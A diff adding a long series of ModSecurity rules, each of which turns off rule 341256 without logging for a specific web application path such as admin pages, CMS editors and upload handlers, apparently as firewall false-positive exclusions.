+SecRule REQUEST_FILENAME "/components/com_zoom/etc/" "phase:2,id:93091,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_orders\.php" "phase:2,id:93092,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup\.jspa" "phase:2,id:93093,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages\.php" "phase:2,id:93094,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql\.php3" "phase:2,id:93095,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sql\.php" "phase:2,id:93096,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ipn_main_handler\.php" "phase:2,id:93097,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/xcloner\.php" "phase:2,id:93098,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/content\.php" "phase:2,id:93099,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailordermanager5\.mvc" "phase:2,id:93100,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content_pop\.php" "phase:2,id:93101,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backend/noticias_abm\.php" "phase:2,id:93102,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pncrtl/options\.php" "phase:2,id:93103,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.cgi" "phase:2,id:93104,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fim_thumb\.php" "phase:2,id:93105,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/intaketemp\.php" "phase:2,id:93106,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sqltoexcel/sql2excel\.php" "phase:2,id:93107,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/moodle/mod/glossary/edit\.php" "phase:2,id:93108,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/miespacio/adpaepdc\.php" "phase:2,id:93109,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "ext/ics_awstats/mod1/index\.php" "phase:2,id:93110,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/edit/modules/eshop/product/insert" "phase:2,id:93111,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:93112,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/response_3d\.php" "phase:2,id:93113,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/getclientpolicies\.aspx" "phase:2,id:93114,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_product\.php" "phase:2,id:93115,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/page\.php" "phase:2,id:93116,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.ph" "phase:2,id:93117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/resize\.php$" "phase:2,id:93118,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/nota_abm\.php$" "phase:2,id:93119,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/service/producttocategory\.php" "phase:2,id:93120,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:93121,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_file_upload\.php" "phase:2,id:93122,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_create_folder\.php" "phase:2,id:93123,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/test_templates\.php" "phase:2,id:93124,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:93125,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webacula/restorejob/" "phase:2,id:93126,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/calendar/functions/popup\.php" "phase:2,id:93127,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/" "phase:2,id:93128,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_export\.php" "phase:2,id:93129,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:93130,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/civicrm/admin/" "phase:2,id:93131,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/civicrm/report/contact/summary" "phase:2,id:93132,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/instellingen\.php" "phase:2,id:93133,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/listing_editresult\.php" "phase:2,id:93134,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/items_price_result\.php" "phase:2,id:93135,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/configure_homepage\.php" "phase:2,id:93136,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/newreply\.php" "phase:2,id:93137,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editpost\.php" "phase:2,id:93138,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/file_manager\.php" "phase:2,id:93139,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/conteudosactions\.php" "phase:2,id:93140,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webim/button\.php" "phase:2,id:93141,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/multimediaactions\.php" "phase:2,id:93142,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/lojaactions\.php" "phase:2,id:93143,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/config/index\.php" "phase:2,id:93144,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modedit\.php" "phase:2,id:93145,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/categories\.php" "phase:2,id:93146,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addclass\.php" "phase:2,id:93147,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/medialibrary\.php" "phase:2,id:93148,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/meta_admin\.php" "phase:2,id:93149,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/question_edit\.php" "phase:2,id:93150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/processors/directory_addedit\.php" "phase:2,id:93151,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/widgets\.php" "phase:2,id:93152,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/aprod\.php" "phase:2,id:93153,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/ritem\.php" "phase:2,id:93154,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.php" "phase:2,id:93155,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sifr\.swf" "phase:2,id:93156,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/smalladmin/index\.php" "phase:2,id:93157,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content_manager\.php" "phase:2,id:93158,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/account/loginpost/" "phase:2,id:93159,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/package_edit\.php" "phase:2,id:93160,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/setup\.cgi" "phase:2,id:93161,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pncrtl/template\.php" "phase:2,id:93162,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/novedades_abm\.php" "phase:2,id:93163,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/pmanage/pmanage\.cgi" "phase:2,id:93164,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sage/download\.php" "phase:2,id:93165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/versioncheck\.php" "phase:2,id:93166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kameleon\.php" "phase:2,id:93167,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/click\.php" "phase:2,id:93168,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/cruise_co_process\.php" "phase:2,id:93169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportcenter/" "phase:2,id:93170,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:93171,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/files_code\.php" "phase:2,id:93172,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modify\.php" "phase:2,id:93173,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/layout/edit/" "phase:2,id:93174,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_behaviour\.php" "phase:2,id:93175,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/otrs/index\.pl" "phase:2,id:93176,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content/edit/" "phase:2,id:93177,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ises/config\.php" "phase:2,id:93178,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cacti/data_input\.php" "phase:2,id:93179,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/bmailercp\.cgi" "phase:2,id:93180,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:93181,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/control_panel\.php" "phase:2,id:93182,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:93183,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/css/gallery-css\.php" "phase:2,id:93184,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/rcv_paypal\.php" "phase:2,id:93185,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload_crop\.php" "phase:2,id:93186,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/generic_edit\.php" "phase:2,id:93187,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:93188,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/collect_db\.php" "phase:2,id:93189,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/a__iiconcreatelive\.php" "phase:2,id:93190,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/etc/get_testimonial\.php" "phase:2,id:93191,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_vti_bin/_vti_aut/author\.exe" "phase:2,id:93192,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/reclame\.php" "phase:2,id:93193,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/itron\.php" "phase:2,id:93194,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcode\.php" "phase:2,id:93195,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_highlighted_block\.php" "phase:2,id:93196,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_block_highlight\.php" "phase:2,id:93197,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/query_block\.php" "phase:2,id:93198,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/index\.php" "phase:2,id:93199,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/rss\.php" "phase:2,id:93200,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/cms-edit\.php" "phase:2,id:93201,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/manufacturers\.php" "phase:2,id:93202,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/eventaddaction\.php" "phase:2,id:93203,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/customerror" "phase:2,id:93204,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_design\.php" "phase:2,id:93205,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/api\.php" "phase:2,id:93206,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editresult_listing\.php" "phase:2,id:93207,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/products_product_process\.php" "phase:2,id:93208,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_prod\.php" "phase:2,id:93209,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editproperty_process\.php" "phase:2,id:93210,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sections_process\.php" "phase:2,id:93211,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sg_saveentry\.php" "phase:2,id:93212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_content_config\.php" "phase:2,id:93213,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/credit_log2\.php" "phase:2,id:93214,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/folio-edit\.php" "phase:2,id:93215,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:93216,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:93217,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:93218,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flvprovider\.php" "phase:2,id:93219,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/subscribe_user2group\.php" "phase:2,id:93220,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcontent_process\.php" "phase:2,id:93221,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/select_category\.php" "phase:2,id:93222,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/options\.php" "phase:2,id:93223,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editroster\.php" "phase:2,id:93224,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process\.php" "phase:2,id:93225,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/properties\.php" "phase:2,id:93226,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_update\.php" "phase:2,id:93227,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodadd\.php" "phase:2,id:93228,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt\.fcgi" "phase:2,id:93229,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt\.cgi" "phase:2,id:93230,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systeembeheer/" "phase:2,id:93231,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/add_sighting\.php" "phase:2,id:93232,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ticket_detail\.php" "phase:2,id:93233,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/createsite\.php" "phase:2,id:93234,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cleanedit\.php" "phase:2,id:93235,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/zabbix/setup\.php" "phase:2,id:93236,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upldgallery\.php" "phase:2,id:93237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tooltip_result\.php" "phase:2,id:93238,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_orders\.php" "phase:2,id:93239,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tableedit\.php" "phase:2,id:93240,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_previewjobs\.php" "phase:2,id:93241,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/businessadd2\.php" "phase:2,id:93242,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/packages-rest\.php" "phase:2,id:93243,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:93244,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editmessagesexec\.php" "phase:2,id:93245,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backend\.php" "phase:2,id:93246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/redirect\.php" "phase:2,id:93247,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edetailing_nsclc\.html" "phase:2,id:93248,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wibstats\.php" "phase:2,id:93249,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/plugin\.php" "phase:2,id:93250,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/maakpromotieorderb\.php" "phase:2,id:93251,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/listcontent\.php" "phase:2,id:93252,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showtable/update\.php" "phase:2,id:93253,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/locations/editphoto\.php" "phase:2,id:93254,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/translation_tool\.php" "phase:2,id:93255,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edituserplugin\.php" "phase:2,id:93256,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/mailbox\.php" "phase:2,id:93257,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/services/prefs\.php" "phase:2,id:93258,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/update-page\.php" "phase:2,id:93259,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/uploadify/uploadify\.php" "phase:2,id:93260,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/savestory\.php" "phase:2,id:93261,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/chat/server\.php" "phase:2,id:93262,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cha-insertproduct\.php" "phase:2,id:93263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ezedit/server\.php" "phase:2,id:93264,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat_receive\.php" "phase:2,id:93265,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/news_editresult\.php" "phase:2,id:93266,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/news\.php" "phase:2,id:93267,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/items_attribute_result\.php" "phase:2,id:93268,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bcadmn/index\.php" "phase:2,id:93269,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thub\.php" "phase:2,id:93270,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
